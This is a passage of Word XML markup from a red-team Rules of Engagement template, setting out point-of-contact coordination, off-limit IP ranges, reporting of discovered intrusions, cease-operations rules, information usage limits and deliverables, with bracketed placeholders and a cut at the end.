      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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Provide contact information (i.e., names, job titles, phone &amp; email address) to the signatories of this document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB83819" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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Provide to the Red Team the results of the Vulnerability Assessment scans performed prior to the engagement to create the effects of intelligence gathering background efforts expected of a malicious entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354CBF9F" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>e. Red Team efforts will be coordinated with [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Insert POC position/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> for the duration of the engagement. The Red Team will target only those hosts and Internet protocol (IP) addresses within the confines and control of the target of engagement network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5FF480" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>f. Red Team methods may be intrusive, but should not be destructive, and will be terminated if information is gathered pertaining to an actual intrusion. Red Team is responsible for informing [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Insert POC position/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> if an actual intrusion is discovered. [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Insert POC position/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> will report the actual intrusion to the appropriate representative, along with any substantiating information regarding the detected intrusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6833C61D" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">g. Red Team operations require the use of exploitation and attack tools and techniques. All tools employed by the Red Team have been extensively tested by </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>the team to ensure they are non-destructive and are under positive control when employed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25442ACB" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>h. Red Team systems contain exploit tools, code, and technical references, which are not to be viewed, distributed or evaluated by external organizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432A6292" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>. The Red Team will attempt to gain access to the target of engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C14570D" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>j. Off-limit IP lists are provided as Appendix [ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>. This list should only include those IP ranges within the network that are not part of the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435C69A9" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>k. The Red Team may only conduct activities against client networks that provide sufficient notice to system users that their use of those systems constitutes consent to monitoring. It is the responsibility of the target of engagement legal counsel to review these notice procedures and certify they provide sufficient notice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4E4D5D" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>l. Sensitive information reporting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FAC1E1" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>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Vulnerabilities discovered during the engagement that present an immediate risk to life, limb, or eyesight will be reported promptly to [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Insert POC position/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> to enable immediate response or action. Representatives of the signatories of this ROE will receive follow-on notification as appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEC8717" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>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Incidental discovery of information that relates to serious crimes such as sabotage, threats, or plans to commit offenses that threaten a life or could cause significant damage to or loss of customer property, and which does not present an immediate risk, will be reported to the applicable local authorities for action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40075998" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>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 xml:space="preserve">The Red Team reporting is otherwise conducted in a way that does not attribute information or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>particular activity</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to an individual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7504E6B2" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>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Red Team activities may not be conducted in support of law enforcement or criminal investigation purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581329A2" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>m. Cease operations process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72310623" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>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The Red Team will suspend activity upon detection of computer anomalies that could potentially be unauthorized intrusions into target of environment networks. The Red Team will suspend activity when unintentional information as described above is encountered, and until the appropriate reporting has taken place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC56832" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>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All engagement activities operate under the direction of the Engagement Director, who may alter or cease activities as necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793B2D30" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>n. Information usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E418145" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>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The Red Team will not intentionally compromise Privacy of Information Act (PIA), medical, justice, worship or religious pursuit, or any other protected or privileged information. If a compromise does occur, it will be handled through normal procedures. The proper security personnel will be notified immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62093790" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>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 xml:space="preserve">The Red Team is authorized to exploit files, email, and/or message traffic stored on the network, as well as communications transiting the network for </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>analysis specifically related to the accomplishment of their objectives. (e.g., identifying user ID’s, passwords and/or network IP addresses in order to gain further access).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A58720" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>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 xml:space="preserve">The Red Team will not intentionally modify or delete any operational user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>data, or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> conduct any Denial of Service attacks. The Red Team will not otherwise intentionally degrade or disrupt normal operations of the targeted systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673D9B1B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>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 xml:space="preserve">The Red Team reporting is conducted in a way that does not attribute information or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>particular activity</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, to a specific individual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41745BC3" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>o. Deconfliction process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F11278" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>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All detected information assurance incidents, whether real-world or alleged Red Team activity, should immediately be reported using normal incident reporting processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665E5C22" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>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The [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>customer</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system owner (if different)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ] POC may contact the Red Team’s POC to determine if discovered activities are the result of the Red Team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D017CB0" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>p. Deliverables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D193AD6" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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The Red team will provide an engagement summary presentation for the target of engagement representatives at the completion of the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF307D8" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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The Red Team will provide a written summary of the engagement results to the [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>insert POC position/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> representative within 30 days following completion of the test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1580DD16" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>ROE PROVISIONS</w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:anchor="roe-provisions" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BAE52E3" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The following additional provisions apply to this memorandum:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AE834A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>a. All operations will be conducted within guidelines established by applicable policy, regulations and laws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EF89E4" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
